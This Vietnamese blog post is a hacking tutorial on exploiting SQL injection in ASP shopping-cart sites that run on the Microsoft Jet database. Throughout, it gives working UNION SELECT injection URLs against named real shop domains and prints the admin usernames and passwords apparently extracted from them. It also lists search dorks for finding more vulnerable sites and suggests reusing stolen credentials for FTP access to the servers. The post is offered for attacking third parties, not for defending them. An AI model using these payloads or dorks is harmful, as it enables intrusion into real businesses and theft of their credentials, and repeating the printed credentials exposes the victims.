Thứ Tư, 7 tháng 6, 2017

Hack các shop Jetdatabase

Hack các shop Jetdatabase

Đây là một ví dụ , bạn có thể thực hành ngay tại shop này
bạn thêm vào sau 1 dấu nháy đơn ‘
ok báo lỗi rồi
9′ Microsoft JET Database Engine error ‘80040e14’ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9%’ and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 912
Bạn chú ý chỗ này nhé ———–> Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9%’ and hide=0 order by specialoffer desc,cname’
Khi nó báo như vậy thì ta sẽ dùng union ( bạn giữ nguyên dấu  nhé )
Câu lệnh như sau :
union select 1 from tbluser”having 1=1–sp_password
—-> http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1 from tbluser”having 1=1–sp_password
————-%————–chú thích————-%—————-
Nếu nó báo thế này hoặc tương tự )
Microsoft JET Database Engine error ‘80040e14’ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9’%’union select 1 from tbluser”having 1=1–sp_password and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 912
Bạn thử thay id bằng cat , thay cat bằng id hoặc xoá dấu  xem sao
————————————————————————————-
Tiếp tục nhé
http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1 from tbluser”having 1=1–sp_password
Khi nó báo thế này là được rồi
Microsoft JET Database Engine error ‘80040e14’ The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
Lỗi vừa rồi nói rằng : có tồn tại giá trị column chứa thông tin admin
bạn cứ tiếp tục thêm số vào nhé
http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2 from tbluser”having 1=1–sp_password
nó vẫn báo như vậy
Microsoft JET Database Engine error ‘80040e14’ The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
ta cứ tiếp tục như vậy
http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3 from tbluser”having 1=1–sp_password
http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4 from tbluser”having 1=1–sp_password
http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4,5 from tbluser”having 1=1–sp_password
…………………..
http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser”having 1=1–sp_password
Cho đến khi có 1 cái bảng đẹp đẹp như sau ( ở đây là số 37 )
3
click to see more422
18Please review these other products:
—————————-Chú thích—————————–
Kinh nghiệm qua nhiều lần hack của tôi là bạn nên xem line để thêm số cho nhanh . Ví dụ như ở shop này line là 912 ——-> /shop$db.asp, line 912 , với line là 912 thường thì bạn phải thêm đến 37 . Còn một số nữa :
line 467 —–> thêm đến47
line 468 ——> thêm 47
line 469 ——-> thêm 48
còn lại bạn tự tìm hiểu nha.Nếu không nhớ line thì bạn cứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , 84 ,92 ……( Thông thường tôi chỉ thêm đến 84 là hết kiên nhẫn nổi ) nếu bạn kiên trì thì nên thêm từng số cho chắc ăn () . Tiếp nhé
————————————————————————-
Bây giờ chúng ta bắt đầu lấy user and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 column trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và số 4
Code
http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37 from tbluser”having 1=1–sp_password
ok nó sẽ báo như vầy :
admin
click to see moreadmin32612 22
18Please review these other products:
——————————-
harvey
click to see moreboha216322
18Please review these other products:
ok shop này có 2 admin + admin pass : admin32612
+ harvey pass: boha2163
Trong trường hợp nó chỉ có thế này
3
click to see more
Please review these other products:
bạn chỉ có thể thay vào số 3 mà thôi vậy ta sẽ dùng câu lệnh như sau
union select 1,2, fldusername%2b’/’%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from tbluser”having 1=1–sp_password
cái này tôi không giải thích thêm , chắc bạn hiểu rồi > OK
Việc còn lại là tìm link admin
ta cứ thử 2 link này xem
Nếu link admin ko phải như vậy, thi bạn dùng câu lệnh sau :
union select 1,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from configuration”having 1=1–sp_password
fieldvalue và configuration là gì thì bạn hiểu rồi không nói nữa. Câu lệnh này sẽ cho ra rất nhiều kết quả
bạn cứ view hết từng trang (thường có 10 trang ) thu thập các link có đuôi .asp rồi thay vào thử xem có phải link admin ko
————-<%>————-<%>——————————————
Ngoài ra tôi xin trích thêm bài của lão vietcuongconan ( tôi thường làm theo kiểu này )
shopdisplayproducts.asp?id=1’lỗi ok! chúng ta thường sài một câu truy vấn để lấy thông tin:
CODE
%20union%20select%201%20from%20″table”%27
“union select 1 from “table”‘
theo kinh nghiệm tôi rút ra được một điều. đó là chúng ta có thễ dựa vào số linemà đoán số column
CODE
line191 — 56line184 — 47,43,53line188 — 53,56line191 — 48line185 — 86,43line202 — 84,91line208 — 48,57line64 — 53line211,187 — 43line59 — 70……..
sơ bộ vậy thôi…….( các pác cũng có thể xài tool wis and wed của dora để hack….nhưng mình thì kông sài tool để hack mời các bạn tiếp)
chúng ta phải thêm đúng số column thì mới lấy thông tin được……trong trường hợp chúng ta thêm số hoài mà không thấy cái bảng nào ra cả…..vậy phải làm sao đây…..
uh. vậy là nó đã fix!bó tay sao…….không
Cách 1: các bạn đang ở file shopdisplayproducts.asp bây giờ chuyển sang fileshoptellafriend.aspshopexd.asp…….ok!tiếp tục vd:shoptellafriend.aspline cũa nó là: 184 –> sô 47tiếp tục hack
CODE
shoptellafriend.asp?id=1%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser %27
nó ra một cái bản có số 3 hehe!lấy user vào pass nào
CODE
shoptellafriend.asp?id=1%20union%20select%201,2,fl dusername%2b’/’% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t bluser%27
song xuôi, lấy link login nào.
CODE
shoptellafriend.asp?id=1%20union%20select%201, 2,fieldname%2b’/’% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47%20from%20configuration%27
oach! sao chả thấy gì hết vậy……….hixhix….khó rồi đây……..bó tay sao.
bầy giờ chúng ta so sánh nhé.nếu ở file shopdisplayproducts.asp thì nó sẽ đưa ra kết quả cho chúng ta…ở ngay hàng đâu tiên thì bị bỏ trống.và thông tin xuất hiện ở hàng thứ 2vậy cái mà chúng ta vừa lấy được là cái hàng đầu tiên (hơi khó hiểu phải không)vậy chúng ta chỉ cần đưa cái link login về hàng 1 bằng cách thay số 1 bằng
CODE
fieldname=’xadminpage’
——>shoptellafriend.asp?id=1 union select fieldname=’xadminpage’,2,fieldname%2b’/’% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47 from configuration’
ở file shopexd.asp cũng như vậy….
———————-<%>—————<%>———————–
Một số kinh nghiệm về hack shop :
_ Khi lấy được user/pass của điều hành cần dùng nó để đăng nhập server với giao thức ftp nếu “may mắn” (<—-lão hackerjp nói thế ()) bạn có thể làm chủ server và không cần phải phí công nhiều trong khi hack.
_ Có một số trường hợp, site bị lỗi Injectjon nhưng hiện trang báo lỗi (khi ta thêm dấu ‘): The page cannot bedisplayed, bạn cần chú ý phía bên dưới nó vẫn báo lỗi đấy._ Khi hack shop bạn nên xoay nó theo nhiều chiều : thay id bằng cat , để nguyên dấu ‘ hoặc xoá nó đi khi ta query………
_Khi search shop bạn cần cố gắng tìm cách search sao cho thật hiệu quả , một số từ khoá khác mà bạn cũng nên thử :
VP ASP shopping
shop products
intext:”vp-asp shopping” inurl :”.asp?id=”
intext:”products” inurl:”.asp?id=”
và còn nhiều nữa bạn tự tìm hiểu thêm.
_ Tut này chỉ giúp bạn hack được những shop 1 pass ( tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà search)
_ Với những shop 2 pass , thực sự nếu bạn hiểu rõ những gì tôi nói ở trên , thì việc hack pass 2 ko khó…chúc may mắn ()

II- Hack bằng lỗi JET DATABASE – JET DB


Hiên nay nhiều Shop mắc lỗi JET DB
Microsoft JET Database Engine error ‘80040e14’
Cách khai thác tương tự SQL Inject, thêm dấu “ ‘ “ sau link và tìm table, nhưng câu lênh và cách tìm table có khác chút
Xuất hiện thông báo
Microsoft JET Database Engine error ‘80040e14’ 
Syntax error in string in query _expression ‘pId=’23305”’. 
/proddetail.asp, line 246 
Hi` hỉ..Thấy gì chưa á …..Giờ tìm table và collumn của nó á. Câu lệnh truy vấn của nó là
%27union%20select%201%20from%20admin
Sau khi thêm câu lệnh vào sau link :
Ta được:
Microsoft JET Database Engine error ‘80040e14’ 
The number of columns in the two selected tables or queries of a union 
query do not match. 
/proddetail.asp, line 246 
hì hì… có tồn tại columb chứ thông tin admin..Tiếp tục đê..coi columb chứa thông tinh Admin nằm ở đâu….
Ta thêm ,2,3,4 ..v.v….sau chỗ select%201
VD : http://www.kleer-fax.com/proddetail…union%20select% 201,2%20from%20admin (http://www.kleer-fax.com/proddetail…union%20select% 201,2%20from%20admin)
Ta lại được :
Microsoft JET Database Engine error ‘80040e14’ 
The number of columns in the two selected tables or queries of a union 
query do not match. 
/proddetail.asp, line 246 
Tiếp tục thêm ,3 xem sao nào
Lại được:
Microsoft JET Database Engine error ‘80040e14’ 
The number of columns in the two selected tables or queries of a union 
query do not match. 
/proddetail.asp, line 246 
Tiếp tục đến khi nào thấy đuợc Columb thì thôi á….
Ở Site này ..ta dừng lại ở 14
http://www.kleer-fax.com/proddetail…union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14%20from%20admin
Đây rùi :
Home : All Products
4-5-6
Item: 3 List Price: $9.00 USD

1
Chú ý số 7 và 1 nhé, đó là thông tin của 2 columb chứa thông tin Admin ( user/ pass)
Ta thay câu lệnh truy vấn user và pass admin vào vị trí 1 và 7:
and%201=0%20union%20select%201,2,’username:%20’%2b adminuser,4,5,6,’pass
word:%20’%2badminpassword,8,9,10,11,12,13,14%20fro m%20admin
Và Kết quả :
http://www.kleer-fax.com/proddetail…%201=0%20union% 20select%201%2c2%2c%27username:%20%27%2badminuser% 2c4%2c5%2c6%2c%27password:%20%27%2badminpassword%2 c8%2c9%2c10%2c11%2c12%2c13%2c14%20from%20admin
..Phu`…đây…
Item: username: kleer1 List Price: $9.00 USD
password: do750boy 
ui ui…hi` hi`…
Please choose from the list below.
Change username / password: 
Edit admin settings: 
Edit categories: 
Edit products: 
Logout: 
Đuợc rùi á
Chú ý: Khi union được mà ko báo lỗi thì mới dùng and 1=0
Trường hợp này thì phải thêm vào á….1 site tương tự cũng dính lỗi này, mà ko cần thêm and 1=0 khi truy vấn thông tin Admin
Ở Site này
Sau khi tìm table
http://www.satinslippers.com/shop/proddeta…pots23305’%
20union%20select%201,2,3,4,5,6,7,8,9,10%20from%20a dmin
Ta được 2 Colum 2 va 8
( Nhớ nhìn kĩ chút…vì site này nó bị lệch chút đỉnh á , mới đầu MAY lay hoay nhìn ko ra cái columb á, tưởng làm sai gì rồi á…ui ui..thì ra có á…)
http://www.satinslippers.com/shop/p…ckerpots%27%20u
nion%20select%201%2c%27username:%20%27%2badminuser %2c3%2c4%2c5%2c6%2c7%
2c%27password:%20%27%2badminpassword%2c9%2c10%20fr om%20admin
Ok , ra rùi
username: satinslippers 
password: ss2980
. Kiếm link đăng nhập thoai

III-Hack Lỗi Jet Database:

Đây là dạng lỗi SQL mà khai thác dễ nhất nhưng đòi hỏi có 1 chút kinh nghiệm trong quá trình khái thác vì phải đoán table và column
Một số dork dùng để tìm site dính lỗ hổng bảo mật Jet:
tintuc.asp?tin_ID=
chitiet.asp?ID=
Victim hôm nay soleil sẽ demo là:
http://thanhancamera.com/news.asp?tin_ID=86
Bước 1: Check lỗi
Thêm dấu’ vào cuối đường link url, nếu site dính lỗi sẽ xuất hiện thông báo như sau:
http://thanhancamera.com/news.asp?tin_ID=86
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘tin_ID=86 ”.
/news.asp, line 16
Bước 2: Tìm số trường cột
http://thanhancamera.com/news.asp?tin_ID=86 order by 1 -> Site bình thường
http://thanhancamera.com/news.asp?tin_ID=86 order by  6 -> Site bình thường
http://thanhancamera.com/news.asp?tin_ID=86 order by 7 -> Xuất hiện lỗi
Microsoft OLE DB Provider for ODBC Drivers error ‘80004005’
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize ‘7’ as a valid field name or expression.
/news.asp, line 1
   Số cột cần tìm là 6
Bước 3: Đoán tên table
Một số tables chứa thông tin admin và password như:
 tb_admin, tbl_admin, tbl_user, tbl_users, tbluser, user, admin, …..
Ở dạng này theo kinh nghiệm khai thác của soleil thì table_name phổ biến nhất vẫn là tb_admin
Nếu site hoạt động bình thường và xuất hiện nhưng con số, chứng tỏ table được đoán là chính xác.  Những con số được xuất hiện chính là vị trí table bị lỗi. Chúng ta có thể khai thác bằng cách chèn các mã lệnh tại vị trí đó.
Còn không site sẽ xuất hiện lỗi như sau:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e37’
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query ‘tbl_user’. Make sure it exists and that its name is spelled correctly.
/news.asp, line 16
http://thanhancamera.com/news.asp?tin_ID=-86 UNION SELECT 1,2,3,4,5,6 from tb_admin
Trong trường hợp này các tables ở vị trí 1,2,3,4 bị lỗi. Chúng ta có thể khai thác tại những vị trí đó. soleil sẽ check ở vị trí thứ 2 và 3
Bước 4:  Đoán tên column
Một số columns chứa thông tin admin và password như:
Username-password, uid-pwd….
Ở dạng này phổ biến nhất vẫn là : username,password
http://thanhancamera.com/news.asp?tin_ID=-86  UNION SELECT 1,2,username,password,5,6 from tb_admin

Nếu xuất hiện thông tin tại vị trí được khai thác như trên, chứng tỏ column được đoán là chính xác
Username: admin, password: tienthong33
Bước 5: Tìm đường link loggin admin
Một số tool sử dụng để tìm link admin như:  havij, admin finder, web admin finder.
Với  các dork soleil đưa ra ở phía trên, chúng ta có thể tìm được các site dính lỗ hổng Jet và khai thác tương tư:
Người đăng: vào lúc
Nhãn:

Không có nhận xét nào:

Đăng nhận xét

Đăng ký: Đăng Nhận xét (Atom)